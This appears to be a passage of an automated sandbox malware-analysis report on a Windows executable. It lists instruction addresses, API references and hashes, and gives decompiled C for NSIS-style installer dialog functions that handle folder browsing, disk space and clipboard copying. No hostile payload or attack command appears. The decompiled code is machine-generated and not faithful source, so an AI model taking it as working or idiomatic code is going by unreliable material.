              0x00404fe9
              0x00404fe9
              0x00000000
              0x00404e5d
              0x00404e5f
              0x00404e64
              0x00404e69
              0x00404e6e
              0x00404e70
              0x00404e70
              0x00404e71
              0x00404e72
              0x00404e74
              0x00404e74
              0x00404e7c
              0x00404ebd
              0x00404ebf
              0x00404ecf
              0x00404ed2
              0x00404ed7
              0x00404ede
              0x00404ee1
              0x00404f83
              0x00404f89
              0x00404f8f
              0x00404f97
              0x00404fa8
              0x00404fa8
              0x00000000
              0x00404f97
              0x00404ee7
              0x00404eea
              0x00404ef0
              0x00404ef5
              0x00404ef7
              0x00404ef9
              0x00404eff
              0x00404f06
              0x00404f0b
              0x00404f12
              0x00404f15
              0x00404f15
              0x00404f1c
              0x00404f28
              0x00404f2c
              0x00404f2e
              0x00404f2e
              0x00404f1e
              0x00404f20
              0x00404f20
              0x00404f4e
              0x00404f5a
              0x00404f69
              0x00404f69
              0x00404f6b
              0x00404f6e
              0x00404f77
              0x00000000
              0x00404e7e
              0x00404e89
              0x00404e8c
              0x00404e91
              0x00404e93
              0x00404e97
              0x00404ea7
              0x00404eb1
              0x00404eb3
              0x00404eb6
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00404e99
              0x00404e99
              0x00404e9f
              0x00404ea1
              0x00404ea1
              0x00404ea2
              0x00404ea3
              0x00000000
              0x00404e99
              0x00404e7c
              0x00404e57
              0x00404d9a
              0x00000000
              0x00404db0
              0x00404dba
              0x00404dbf
              0x00000000
              0x00000000
              0x00404dd1
              0x00404dd6
              0x00404de2
              0x00404de2
              0x00404de4
              0x00404df3
              0x00404df5
              0x00404df9
              0x00404dfc
              0x00000000
              0x00404dfc
              0x00404d9a
              0x00404a5b
              0x00404a60
              0x00404a69
              0x00404a70
              0x00404a7e
              0x00404a89
              0x00404a8f
              0x00404a9d
              0x00404ab1
              0x00404ab6
              0x00404ac3
              0x00404ac8
              0x00404ade
              0x00404aef
              0x00404afc
              0x00404afc
              0x00404aff
              0x00404b05
              0x00404b07
              0x00404b0a
              0x00404b0f
              0x00404b14
              0x00404b16
              0x00404b16
              0x00404b36
              0x00404b36
              0x00404b38
              0x00404b39
              0x00404b3e
              0x00404b41
              0x00404b44
              0x00404b48
              0x00404b4d
              0x00404b52
              0x00404b56
              0x00404b5b
              0x00404b60
              0x00404b62
              0x00404b6a
              0x00404c34
              0x00404c47
              0x00000000
              0x00404b70
              0x00404b73
              0x00404b76
              0x00404b79
              0x00404b79
              0x00404b7f
              0x00404b85
              0x00404b88
              0x00404b8e
              0x00404b8f
              0x00404b94
              0x00404b9d
              0x00404ba4
              0x00404ba7
              0x00404baa
              0x00404bad
              0x00404be9
              0x00404c12
              0x00404beb
              0x00404bf8
              0x00404bf8
              0x00404baf
              0x00404bb2
              0x00404bc1
              0x00404bcb
              0x00404bd3
              0x00404bda
              0x00404be2
              0x00404be2
              0x00404bad
              0x00404c18
              0x00404c19
              0x00404c25
              0x00404c25
              0x00404c32
              0x00404c4d
              0x00404c51
              0x00404c6e
              0x00404c73
              0x00000000
              0x00404c53
              0x00404c58
              0x00404c61
              0x00404feb
              0x00404ffd
              0x00404ffd
              0x00404c51
              0x00000000
              0x00404c32
              0x00404b6a

              APIs
              • GetDlgItem.USER32 ref: 00404A21
              • GetDlgItem.USER32 ref: 00404A2C
              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A76
              • LoadBitmapA.USER32 ref: 00404A89
              • SetWindowLongA.USER32 ref: 00404AA2
              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404AB6
              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404AC8
              • SendMessageA.USER32(?,00001109,00000002), ref: 00404ADE
              • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404AEA
              • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404AFC
              • DeleteObject.GDI32(00000000), ref: 00404AFF
              • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404B2A
              • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404B36
              • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404BCB
              • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404BF6
              • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C0A
              • GetWindowLongA.USER32 ref: 00404C39
              • SetWindowLongA.USER32 ref: 00404C47
              • ShowWindow.USER32(?,00000005), ref: 00404C58
              • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404D55
              • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404DBA
              • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404DCF
              • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404DF3
              • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E13
              • ImageList_Destroy.COMCTL32(?), ref: 00404E28
              • GlobalFree.KERNEL32 ref: 00404E38
              • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404EB1
              • SendMessageA.USER32(?,00001102,?,?), ref: 00404F5A
              • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404F69
              • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F89
              • ShowWindow.USER32(?,00000000), ref: 00404FD7
              • GetDlgItem.USER32 ref: 00404FE2
              • ShowWindow.USER32(00000000), ref: 00404FE9
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.497583123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.497576067.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497592829.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497657116.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_P196hUN2fw.jbxd
              Similarity
              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
              • String ID: $M$N
              • API String ID: 1638840714-813528018
              • Opcode ID: 3b740f44a2b1d633ad343a76b016798f79b98c3f4b333677a90c7392331c9530
              • Instruction ID: 5e7fd9033250abe3372a8cc080de2667683fe8f184775387c018329cb0bba4e6
              • Opcode Fuzzy Hash: 3b740f44a2b1d633ad343a76b016798f79b98c3f4b333677a90c7392331c9530
              • Instruction Fuzzy Hash: 9502A1B0A00209AFEB20DF55DD85AAE7BB5FB84315F14413AFA10B62E1C7789D42CF58
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004051CA Relevance: 54.3, APIs: 36, Instructions: 282windowclipboardmemoryCOMMON
              Download Yara Rule
              C-Code - Quality: 96%
              			E004051CA(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				struct tagRECT _v24;
				void* _v32;
				signed int _v36;
				int _v40;
				int _v44;
				signed int _v48;
				int _v52;
				void* _v56;
				void* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t87;
				struct HWND__* _t89;
				long _t90;
				int _t95;
				int _t96;
				long _t99;
				void* _t102;
				intOrPtr _t124;
				struct HWND__* _t128;
				int _t150;
				int _t153;
				long _t157;
				struct HWND__* _t161;
				struct HMENU__* _t163;
				long _t165;
				void* _t166;
				char* _t167;
				char* _t168;
				int _t169;

				_t87 =  *0x42ebe4; // 0x0
				_t157 = _a8;
				_t150 = 0;
				_v8 = _t87;
				if(_t157 != 0x110) {
					__eflags = _t157 - 0x405;
					if(_t157 == 0x405) {
						CloseHandle(CreateThread(0, 0, E0040515E, GetDlgItem(_a4, 0x3ec), 0,  &_a8));
					}
					__eflags = _t157 - 0x111;
					if(_t157 != 0x111) {
						L17:
						__eflags = _t157 - 0x404;
						if(_t157 != 0x404) {
							L25:
							__eflags = _t157 - 0x7b;
							if(_t157 != 0x7b) {
								goto L20;
							}
							_t89 = _v8;
							__eflags = _a12 - _t89;
							if(_a12 != _t89) {
								goto L20;
							}
							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
							__eflags = _t90 - _t150;
							_a12 = _t90;
							if(_t90 <= _t150) {
								L36:
								return 0;
							}
							_t163 = CreatePopupMenu();
							AppendMenuA(_t163, _t150, 1, E00405F87(_t150, _t157, _t163, _t150, 0xffffffe1));
							_t95 = _a16;
							__eflags = _a16 - 0xffffffff;
							_t153 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v24);
								_t95 = _v24.left;
								_t153 = _v24.top;
							}
							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
							__eflags = _t96 - 1;
							if(_t96 == 1) {
								_t165 = 1;
								__eflags = 1;
								_v56 = _t150;
								_v44 = 0x42a870;
								_v40 = 0x1000;
								_a4 = _a12;
								do {
									_a4 = _a4 - 1;
									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
									__eflags = _a4 - _t150;
									_t165 = _t165 + _t99 + 2;
								} while (_a4 != _t150);
								OpenClipboard(_t150);
								EmptyClipboard();
								_t102 = GlobalAlloc(0x42, _t165);
								_a4 = _t102;
								_t166 = GlobalLock(_t102);
								do {
									_v44 = _t166;
									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
									 *_t167 = 0xd;
									_t168 = _t167 + 1;
									 *_t168 = 0xa;
									_t166 = _t168 + 1;
									_t150 = _t150 + 1;
									__eflags = _t150 - _a12;
								} while (_t150 < _a12);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						__eflags =  *0x42ebcc - _t150; // 0x1
						if(__eflags == 0) {
							ShowWindow( *0x42f408, 8);
							__eflags =  *0x42f4ac - _t150;
							if( *0x42f4ac == _t150) {
								E0040508C( *((intOrPtr*)( *0x42a048 + 0x34)), _t150);
							}
							E00403FFF(1);
							goto L25;
						}
						 *0x429c40 = 2;
						E00403FFF(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E0040408D(_t157, _a12, _a16);
						}
						ShowWindow( *0x42ebd0, _t150);
						ShowWindow(_v8, 8);
						E0040405B(_v8);
						goto L17;
					}
				}
				_v48 = _v48 | 0xffffffff;
				_v36 = _v36 | 0xffffffff;
				_t169 = 2;
				_v56 = _t169;
				_v52 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				_t124 =  *0x42f414;
				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
				_a8 =  *((intOrPtr*)(_t124 + 0x60));
				 *0x42ebd0 = GetDlgItem(_a4, 0x403);
				 *0x42ebc8 = GetDlgItem(_a4, 0x3ee);
				_t128 = GetDlgItem(_a4, 0x3f8);
				 *0x42ebe4 = _t128;
				_v8 = _t128;
				E0040405B( *0x42ebd0);
				 *0x42ebd4 = E0040492A(4);
				 *0x42ebec = 0;
				GetClientRect(_v8,  &_v24);
				_v48 = _v24.right - GetSystemMetrics(_t169);
				SendMessageA(_v8, 0x101b, 0,  &_v56);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a12 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a12);
					SendMessageA(_v8, 0x1026, 0, _a12);
				}
				if(_a8 >= _t150) {
					SendMessageA(_v8, 0x1024, _t150, _a8);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00404026(_a4);
				if(( *0x42f41c & 0x00000003) != 0) {
					ShowWindow( *0x42ebd0, _t150);
					if(( *0x42f41c & 0x00000002) != 0) {
						 *0x42ebd0 = _t150;
					} else {
						ShowWindow(_v8, 8);
					}
					E0040405B( *0x42ebc8);
				}
				_t161 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t161, 0x401, _t150, 0x75300000);
				if(( *0x42f41c & 0x00000004) != 0) {
					SendMessageA(_t161, 0x409, _t150, _a8);
					SendMessageA(_t161, 0x2001, _t150, _a12);
				}
				goto L36;
			}



































              0x004051d0
              0x004051d8
              0x004051db
              0x004051e3
              0x004051e6
              0x00405375
              0x0040537b
              0x0040539f
              0x0040539f
              0x004053ab
              0x004053b1
              0x004053d3
              0x004053d3
              0x004053d9
              0x0040542e
              0x0040542e
              0x00405431
              0x00000000
              0x00000000
              0x00405433
              0x00405436
              0x00405439
              0x00000000
              0x00000000
              0x00405443
              0x00405449
              0x0040544b
              0x0040544e
              0x0040554b
              0x00000000
              0x0040554b
              0x0040545d
              0x00405469
              0x00405472
              0x00405479
              0x0040547d
              0x00405480
              0x00405489
              0x0040548f
              0x00405492
              0x00405492
              0x004054a2
              0x004054a8
              0x004054ab
              0x004054b6
              0x004054b6
              0x004054b7
              0x004054ba
              0x004054c1
              0x004054c8
              0x004054d0
              0x004054d0
              0x004054de
              0x004054e4
              0x004054e7
              0x004054e7
              0x004054ee
              0x004054f4
              0x004054fd
              0x00405504
              0x0040550d
              0x0040550f
              0x00405512
              0x00405521
              0x00405523
              0x00405526
              0x00405527
              0x0040552a
              0x0040552b
              0x0040552c
              0x0040552c
              0x00405534
              0x0040553f
              0x00405545
              0x00405545
              0x00000000
              0x004054ab
              0x004053db
              0x004053e1
              0x0040540f
              0x00405411
              0x00405417
              0x00405422
              0x00405422
              0x00405429
              0x00000000
              0x00405429
              0x004053e5
              0x004053ef
              0x00000000
              0x004053b3
              0x004053b3
              0x004053b9
              0x004053f4
              0x00000000
              0x004053fb
              0x004053c2
              0x004053c9
              0x004053ce
              0x00000000
              0x004053ce
              0x004053b1
              0x004051ec
              0x004051f0
              0x004051f8
              0x004051fc
              0x004051ff
              0x00405202
              0x00405205
              0x00405208
              0x00405209
              0x0040520a
              0x00405223
              0x00405226
              0x00405230
              0x0040523f
              0x00405247
              0x0040524f
              0x00405254
              0x00405257
              0x00405263
              0x0040526c
              0x00405275
              0x00405297
              0x0040529d
              0x004052ae
              0x004052b3
              0x004052c1
              0x004052cf
              0x004052cf
              0x004052d4
              0x004052e2
              0x004052e2
              0x004052e7
              0x004052ea
              0x004052ef
              0x004052fb
              0x00405304
              0x00405311
              0x00405320
              0x00405313
              0x00405318
              0x00405318
              0x0040532c
              0x0040532c
              0x00405340
              0x00405349
              0x00405352
              0x00405362
              0x0040536e
              0x0040536e
              0x00000000

              APIs
              • GetDlgItem.USER32 ref: 00405229
              • GetDlgItem.USER32 ref: 00405238
              • GetClientRect.USER32 ref: 00405275
              • GetSystemMetrics.USER32 ref: 0040527C
              • SendMessageA.USER32(?,0000101B,00000000,?), ref: 0040529D
              • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004052AE
              • SendMessageA.USER32(?,00001001,00000000,?), ref: 004052C1
              • SendMessageA.USER32(?,00001026,00000000,?), ref: 004052CF
              • SendMessageA.USER32(?,00001024,00000000,?), ref: 004052E2
              • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405304
              • ShowWindow.USER32(?,00000008), ref: 00405318
              • GetDlgItem.USER32 ref: 00405339
              • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405349
              • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405362
              • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040536E
              • GetDlgItem.USER32 ref: 00405247
                • Part of subcall function 0040405B: SendMessageA.USER32(00000028,?,00000001,00403E8B), ref: 00404069
              • GetDlgItem.USER32 ref: 0040538A
              • CreateThread.KERNEL32 ref: 00405398
              • CloseHandle.KERNEL32(00000000), ref: 0040539F
              • ShowWindow.USER32(00000000), ref: 004053C2
              • ShowWindow.USER32(?,00000008), ref: 004053C9
              • ShowWindow.USER32(00000008), ref: 0040540F
              • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405443
              • CreatePopupMenu.USER32 ref: 00405454
              • AppendMenuA.USER32 ref: 00405469
              • GetWindowRect.USER32 ref: 00405489
              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004054A2
              • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004054DE
              • OpenClipboard.USER32(00000000), ref: 004054EE
              • EmptyClipboard.USER32 ref: 004054F4
              • GlobalAlloc.KERNEL32(00000042,?), ref: 004054FD
              • GlobalLock.KERNEL32 ref: 00405507
              • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040551B
              • GlobalUnlock.KERNEL32(00000000), ref: 00405534
              • SetClipboardData.USER32 ref: 0040553F
              • CloseClipboard.USER32 ref: 00405545
              Memory Dump Source
              • Source File: 00000000.00000002.497583123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.497576067.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497592829.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497657116.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_P196hUN2fw.jbxd
              Similarity
              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
              • String ID:
              • API String ID: 590372296-0
              • Opcode ID: d5273281f7ca55948d0d67e565d88e3eec44a4adc77553a27c5bfa0cd5b41917
              • Instruction ID: ba98567820032f63b871bd6861c5d6e43a3521a54ecc658c1b1e5281d96d67ec
              • Opcode Fuzzy Hash: d5273281f7ca55948d0d67e565d88e3eec44a4adc77553a27c5bfa0cd5b41917
              • Instruction Fuzzy Hash: D6A14971900608BFDF11AF61DE89AAF7F79EB04354F40403AFA41B61A0CB755E519F68
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00404496 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 274stringCOMMON
              Download Yara Rule
              C-Code - Quality: 78%
              			E00404496(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed char _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				CHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed char* _t160;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x42a048;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x430000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405665(0x3fb, _t146);
					E004061CF(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405665(0x3fb, _t146);
							if(E004059EB(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E00405F65(0x429840, _t146);
							_t87 = E004062FD(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00405F65(0x429840, _t146);
								_t89 = E00405996(0x429840);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x429840,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x429840) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x429840,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405944(0x429840);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160 - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x429840) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E0040492A(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x42ebdc; // 0x4cc0ca
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E00404912(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x429830);
									} else {
										E0040484D(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42f4c4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E00404048(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x42a860 == _t158) {
									E004043EF();
								}
								 *0x42a860 = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x42a870;
							_v60 = E004047E7;
							_v56 = _t146;
							_v68 = E00405F87(_t146, 0x42a870, _t166, 0x429c48, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E004058FD(_t146);
								_t125 =  *((intOrPtr*)( *0x42f414 + 0x11c));
								if( *((intOrPtr*)( *0x42f414 + 0x11c)) != 0 && _t146 == 0x435400) {
									E00405F87(_t146, 0x42a870, _t166, 0, _t125);
									if(lstrcmpiA(0x42e3a0, 0x42a870) != 0) {
										lstrcatA(_t146, 0x42e3a0);
									}
								}
								 *0x42a860 =  *0x42a860 + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E0040596A(_t146) != 0 && E00405996(_t146) == 0) {
						E004058FD(_t146);
					}
					 *0x42ebd8 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00404026(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00404026(_t166);
					E0040405B(_t165);
					_t138 = E004062FD(7);
					if(_t138 == 0) {
						L53:
						return E0040408D(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}














































              0x00404496
              0x0040449c
              0x004044a2
              0x004044af
              0x004044bd
              0x004044c0
              0x004044c8
              0x004044ce
              0x004044ce
              0x004044da
              0x004044dd
              0x0040454b
              0x00404552
              0x00404629
              0x00404630
              0x0040463f
              0x0040463f
              0x00404643
              0x0040464d
              0x0040465a
              0x0040465c
              0x0040465c
              0x0040466a
              0x00404671
              0x00404678
              0x0040467b
              0x004046b2
              0x004046b4
              0x004046ba
              0x004046bf
              0x004046c3
              0x004046c5
              0x004046c5
              0x004046e1
              0x00000000
              0x004046e3
              0x004046e6
              0x004046f4
              0x004046fa
              0x004046fb
              0x004046fe
              0x00404701
              0x00000000
              0x00404701
              0x0040467d
              0x0040467f
              0x00404683
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00404685
              0x00404685
              0x00404692
              0x00404697
              0x00000000
              0x00000000
              0x0040469b
              0x0040469d
              0x0040469d
              0x004046a5
              0x004046a7
              0x004046aa
              0x004046ad
              0x004046b0
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x004046b0
              0x0040470d
              0x00404717
              0x0040471a
              0x0040471d
              0x00404724
              0x00404724
              0x00404726
              0x00404726
              0x0040472b
              0x0040472d
              0x00404735
              0x0040473c
              0x0040473e
              0x00404749
              0x00404749
              0x0040473e
              0x00404750
              0x00404759
              0x00404763
              0x0040476b
              0x00404786
              0x0040476d
              0x00404776
              0x00404776
              0x0040476b
              0x0040478b
              0x00404790
              0x00404795
              0x0040479e
              0x0040479e
              0x004047a7
              0x004047a9
              0x004047a9
              0x004047b5
              0x004047bd
              0x004047c7
              0x004047c7
              0x004047cc
              0x00000000
              0x004047cc
              0x0040467b
              0x00404632
              0x00404639
              0x00000000
              0x00000000
              0x00000000
              0x00404639
              0x00404558
              0x00404561
              0x0040457b
              0x00404580
              0x0040458a
              0x00404591
              0x0040459d
              0x004045a0
              0x004045a3
              0x004045aa
              0x004045b2
              0x004045b5
              0x004045b9
              0x004045c0
              0x004045c8
              0x00404622
              0x004045ca
              0x004045cb
              0x004045d2
              0x004045dc
              0x004045e4
              0x004045f1
              0x00404605
              0x00404609
              0x00404609
              0x00404605
              0x0040460e
              0x0040461b
              0x0040461b
              0x004045c8
              0x00000000
              0x00404580
              0x0040456e
              0x00000000
              0x00000000
              0x00404574
              0x00000000
              0x004044df
              0x004044ec
              0x004044f5
              0x00404502
              0x00404502
              0x00404509
              0x0040450f
              0x00404518
              0x0040451b
              0x0040451e
              0x00404526
              0x00404529
              0x0040452c
              0x00404532
              0x00404539
              0x00404540
              0x004047d2
              0x004047e4
              0x00404546
              0x00404549
              0x00000000
              0x00404549
              0x00404540

              APIs
              • GetDlgItem.USER32 ref: 004044E5
              • SetWindowTextA.USER32(00000000,?), ref: 0040450F
              • SHBrowseForFolderA.SHELL32(?,00429C48,?), ref: 004045C0
              • CoTaskMemFree.OLE32(00000000), ref: 004045CB
              • lstrcmpiA.KERNEL32(0042E3A0,0042A870,00000000,?,?), ref: 004045FD
              • lstrcatA.KERNEL32(?,0042E3A0), ref: 00404609
              • SetDlgItemTextA.USER32 ref: 0040461B
                • Part of subcall function 00405665: GetDlgItemTextA.USER32 ref: 00405678
                • Part of subcall function 004061CF: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\P196hUN2fw.exe",766DFA90,C:\Users\user\AppData\Local\Temp\,00000000,004031CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 00406227
                • Part of subcall function 004061CF: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406234
                • Part of subcall function 004061CF: CharNextA.USER32(?,"C:\Users\user\Desktop\P196hUN2fw.exe",766DFA90,C:\Users\user\AppData\Local\Temp\,00000000,004031CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 00406239
                • Part of subcall function 004061CF: CharPrevA.USER32(?,?,766DFA90,C:\Users\user\AppData\Local\Temp\,00000000,004031CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 00406249
              • GetDiskFreeSpaceA.KERNEL32(00429840,?,?,0000040F,?,00429840,00429840,?,00000001,00429840,?,?,000003FB,?), ref: 004046D9
              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004046F4
                • Part of subcall function 0040484D: lstrlenA.KERNEL32(0042A870,0042A870,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404768,000000DF,00000000,00000400,?), ref: 004048EB
                • Part of subcall function 0040484D: wsprintfA.USER32 ref: 004048F3
                • Part of subcall function 0040484D: SetDlgItemTextA.USER32 ref: 00404906
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.497583123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.497576067.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497592829.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
